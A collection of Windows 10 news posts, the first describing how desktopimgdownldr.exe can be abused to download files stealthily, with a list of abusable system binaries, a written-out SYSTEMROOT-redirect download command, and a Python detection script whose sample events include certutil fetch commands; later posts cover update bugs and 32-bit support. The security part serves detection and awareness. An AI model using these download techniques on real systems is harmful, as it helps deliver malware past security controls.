Windows 10 background image tool causes a security issue

A binary in Windows 10 responsible for setting the desktop and lock screen image can help attackers download malware onto a compromised system without raising an alarm.

Known as living-off-the-land binaries (LoLBins), these files ship with the operating system and have a legitimate purpose. Attackers of all stripes abuse them in the post-exploitation phase to hide malicious activity.

The new LoL in the Bin
An attacker can use LoLBins to download and install malware, or to bypass security controls such as UAC or WDAC. Typically, the attack involves fileless malware and reputable cloud services used as hosting.

A list of 13 Windows native executables that can download and/or execute malicious code:

powershell.exe
bitsadmin.exe
certutil.exe
psexec.exe
wmic.exe
mshta.exe
mofcomp.exe
cmstp.exe
windbg.exe
cdb.exe
msbuild.exe
csc.exe
regsvr32.exe

The executable in question, desktopimgdownldr.exe, is part of the Personalization CSP (configuration service provider), which among other things allows defining the lock screen and desktop background images.

In both cases, the setting accepts JPG, JPEG and PNG files stored locally or remotely (HTTP and HTTPS URLs are supported).

Running desktopimgdownldr.exe with administrator privileges overrides the user-defined lock screen image, which could tip the user off that something suspicious is going on.

This can be avoided, though, if the attacker deletes a registry value immediately after executing the binary, leaving the user none the wiser.

Although the executable appears to require high privileges (administrator) so that it can create files in C:\Windows and write to the registry, it can also run as a standard user to download files from an external source.

This is possible by changing the value of the %SYSTEMROOT% environment variable before executing the binary. That changes the download destination and bypasses the access checks:

set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr

Without administrator rights, writing to the registry is not possible, so the lock screen image remains unchanged. In this scenario, the method creates no artifacts other than the downloaded file.

The executable uses the BITS COM object to download the file, and on some machines it tries to locate the COM+ Registration Catalog under %SYSTEMROOT%. Since the attacker has changed that variable, the lookup fails.

Users of Endpoint Detection and Response (EDR) solutions should add desktopimgdownldr.exe to their queries and watchlists and treat it just like certutil.exe, a LoLBin widely used both by advanced hackers doing a government's bidding and by cybercriminals set on a big payday.
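The following is an added example, not code from the article or from the researchers who described this binary: a small watchlist check of the kind the paragraph above recommends, run over a handful of constructed process-creation events. It flags desktopimgdownldr.exe when the /lockscreenurl: value is a remote URL, when the launching command line redefines SYSTEMROOT away from C:\Windows (the trick described above), and when the process runs without administrator rights, and it gives certutil.exe the same treatment for -urlcache fetches. The field names (Image, CommandLine, ParentCommandLine, IntegrityLevel) follow Sysmon Event ID 1 naming and the use of integrity level "Medium" to mean "standard user" are assumptions; the events themselves are made up.

```python
"""Watchlist check for desktopimgdownldr.exe / certutil.exe abuse over
constructed process-creation events (added example, not the article's code)."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample events, not real telemetry. Field names are assumed to
# follow Sysmon Event ID 1 (Image, CommandLine, ParentCommandLine, IntegrityLevel).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # standard user redirects SYSTEMROOT and fetches a remote "image"
        "Image": r"C:\Windows\System32\desktopimgdownldr.exe",
        "CommandLine": r"desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr",
        "ParentCommandLine": r'cmd.exe /c set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr',
        "IntegrityLevel": "Medium",
    },
    {   # management service sets a lock screen from a local file: nothing to flag
        "Image": r"C:\Windows\System32\desktopimgdownldr.exe",
        "CommandLine": r"desktopimgdownldr.exe /lockscreenurl:C:\Corp\lockscreen.png /eventName:mdm",
        "ParentCommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs",
        "IntegrityLevel": "System",
    },
    {   # the certutil pattern the article compares this binary to
        "Image": r"C:\Windows\System32\certutil.exe",
        "CommandLine": r"certutil.exe -urlcache -split -f https://domain.com/payload.bin C:\Users\Public\p.bin",
        "ParentCommandLine": r"powershell.exe -nop -w hidden",
        "IntegrityLevel": "Medium",
    },
    {   # unrelated process, ignored
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": r"notepad.exe C:\Users\alice\notes.txt",
        "ParentCommandLine": r"explorer.exe",
        "IntegrityLevel": "Medium",
    },
]

WATCHLIST = {"desktopimgdownldr.exe", "certutil.exe"}
URL_ARG = re.compile(r"/lockscreenurl:(\S+)", re.IGNORECASE)
# matches `set "SYSTEMROOT=..."` or `SYSTEMROOT=...` and captures the value
SYSTEMROOT_SET = re.compile(r'SYSTEMROOT\s*=\s*"?([^"&\s]+)', re.IGNORECASE)
CERTUTIL_FETCH = re.compile(r"-urlcache\b.*\bhttps?://", re.IGNORECASE)


def image_name(event: Dict[str, str]) -> str:
    """File name of the process image, lower-cased for matching."""
    return event["Image"].rsplit("\\", 1)[-1].lower()


def lockscreen_url(cmdline: str) -> Optional[str]:
    """Value passed to /lockscreenurl:, the switch used in the article's command."""
    m = URL_ARG.search(cmdline)
    return m.group(1) if m else None


def systemroot_override(cmdline: str) -> Optional[str]:
    """SYSTEMROOT value set on a command line, if it points away from the real Windows directory."""
    m = SYSTEMROOT_SET.search(cmdline)
    if not m:
        return None
    value = m.group(1).rstrip("\\")
    return None if value.lower() == "c:\\windows" else value


def analyse(event: Dict[str, str]) -> List[str]:
    """Reasons this event should be flagged; an empty list means it is not flagged."""
    reasons: List[str] = []
    name = image_name(event)
    if name not in WATCHLIST:
        return reasons
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentCommandLine", "")
    if name == "desktopimgdownldr.exe":
        url = lockscreen_url(cmd)
        if url and url.lower().startswith(("http://", "https://")):
            reasons.append(f"remote lock screen source {url}")
        override = systemroot_override(parent) or systemroot_override(cmd)
        if override:
            reasons.append(f"SYSTEMROOT redirected to {override}; download lands outside the Windows directory")
        if event.get("IntegrityLevel") in ("Low", "Medium"):  # assumption: non-admin token
            reasons.append("run without administrator rights: no registry write, lock screen unchanged, only the file is left")
    elif name == "certutil.exe" and CERTUTIL_FETCH.search(cmd):
        reasons.append("certutil -urlcache fetch from a remote URL")
    return reasons


def flagged(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """(image name, reasons) for every event the watchlist flags."""
    out: List[Tuple[str, List[str]]] = []
    for e in events:
        r = analyse(e)
        if r:
            out.append((image_name(e), r))
    return out


if __name__ == "__main__":
    for name, reasons in flagged(SAMPLE_EVENTS):
        print(name)
        for r in reasons:
            print("  -", r)
```

A legitimate MDM or policy engine may set the lock screen from an HTTPS URL, so the remote-URL reason alone is a weak signal; the SYSTEMROOT redirect and a non-administrator token are the parts that distinguish the technique described above from normal use, and the parent process is the first thing to check when triaging a hit.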

Windows 10 2004: buggy again

It has been exactly a month since Windows 10 2004 was released. It has some nice features, but it is still a bit buggy and struggling a little to cope.

Windows 10 version 2004, which was released on May 27, is currently available only to "seekers", that is, those who manually check for updates in the Windows Update settings.

In addition to new features, Windows 10 version 2004 (May 2020 Update) also comes with improvements for blocking potentially unwanted programs, also known as PUPs or PUAs (potentially unwanted applications), from showing up on or being installed on Windows PCs.

The May 2020 Update lets you keep track of potentially unwanted programs and prevent them from being downloaded or installed on Windows 10 systems.

Potentially unwanted programs typically arrive bundled with other software, or in the form of driver or registry "optimizers".

After applying the May 2020 Update, users are reporting that the Windows Security app keeps triggering threat alerts even after the PUA file is gone. Once the PUA has been removed or allowed to run, later Windows Security scans detect the old items again, causing an erroneous detection loop.

It appears that Windows Defender now defaults to identifying PUPs as a threat in Windows 10 version 2004. After the PUP has been removed, Windows Defender identifies the same file again and again on subsequent scans, because the detection history still lists it.

To fix the repeated PUP and PUA warnings in the Windows Security app, delete the PUP history information by following these steps:

• Open File Explorer.
• Navigate to C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service
• In the Service folder, delete the PUP-related files.
• Restart Windows and do a quick scan in Windows Security app.


The notifications for those PUPs won't show up again unless another PUP file lands on your system.

It's not yet clear whether Microsoft is aware of the reports, but a fix may be planned, as the issue has been widely reported by affected users on Microsoft's Answers forum.

The post Windows 10 version 2004 bug triggers repeated security alerts appeared first on Windows Latest

Windows 10 2004 OS update issues

The Windows 10 May 2020 Update was released about a week ago, but only to a select group of PCs that aren't affected by known bugs. Everyone else sees a notification informing them that they can't upgrade their system to Windows 10 version 2004 yet.

This restriction also applies to users whose laptops and desktops use Intel Optane memory, a module that caches your most used programs, videos and documents so you can access them quickly. While PCs with Optane won't automatically update to the latest Windows version, several users have forced the update through the Media Creation Tool and are now complaining about a compatibility error.

“Unable to load DLL ‘iaStorAfsServiceApi.dll’: The specified module could not be found. (Exception from HRESULT: 0x8),” the message reads.

During the update process, Windows 10 removes the Optane Memory Pinning files from the device, which leads to problems when it later tries to run the component. As Windows Latest points out, testers uncovered the compatibility issue months ago and reported it in the Feedback Hub.

“This is a problem because Optane Memory Pinnings should have been moved to the new update, but the files were not, but it is still in the Windows Installer Database. I am unable to remove it because the files and uninstallers themselves are gone and now Windows tries to launch a program with .dlls that do not exist,” one person wrote.

It's possible the complaint sneaked past Microsoft, or the company was so busy trying to fix other widespread issues that it didn't have time to tackle the Optane problem. Whatever the case, users who own PCs with Optane memory should wait for Microsoft to patch the compatibility bug before installing the May 2020 Update.

How to Proceed

If you've manually forced the update onto your machine and are experiencing problems, related to Optane or otherwise, your best bet is to revert to the earlier version of the operating system.

To do so, search for "Update" in Windows Search and choose "Check for Updates." Select "Update History" toward the bottom of the screen, then "Uninstall updates." From this page, find Windows 10 version 2004.

You can also try removing the Optane pinning component: go to the Control Panel and open Programs and Features. From there, right-click Intel Optane Pinning Explorer Extensions and choose "Uninstall."

Microsoft will soon ditch 32-bit Windows

Death of Windows 10 32-bit may be looming as Microsoft ends support for new PCs

The next major Windows 10 update is set to mean big changes for PC makers concerning the versions of the operating system they can offer.

The Windows 10 May 2020 Update, which is due late in May, drops support for the 32-bit version of the operating system on the OEM side.

In other words, as of the next big update, hardware manufacturers will no longer be offered 32-bit versions of Windows 10 to install on their devices, and any PC made going forward will have a 64-bit installation.

This isn't a great surprise, really, and is pretty much the expected move from Microsoft. If you look at the number of people actually running 32-bit Windows 10, it's an extremely small percentage (one fifth of a percent, going by the most recent Steam hardware survey as an example), and the number of new PCs shipping with a 32-bit version is doubtless even smaller.

Don’t press the panic button

That said, before those with old PCs, or folks running the 32-bit flavor of Windows 10 for legacy reasons, start to panic: Microsoft will continue to support existing 32-bit installations of the operating system going forward.

Microsoft clarified: “This does not impact 32-bit customer systems that are manufactured with earlier versions of Windows 10; Microsoft remains committed to providing feature and security updates on these devices, including continued 32-bit media availability in non-OEM channels to support various upgrade installation scenarios.”

However, with 32-bit Windows 10 being phased out on new hardware as of the May 2020 Update, it's clearly on the path to complete extinction. How long Microsoft considers it viable to keep providing updates for existing 32-bit systems is an unknown; we'll just have to see. But as already mentioned, the share of users out there is vanishingly tiny, and at some point a decision might be made about the resources spent on continuing that support.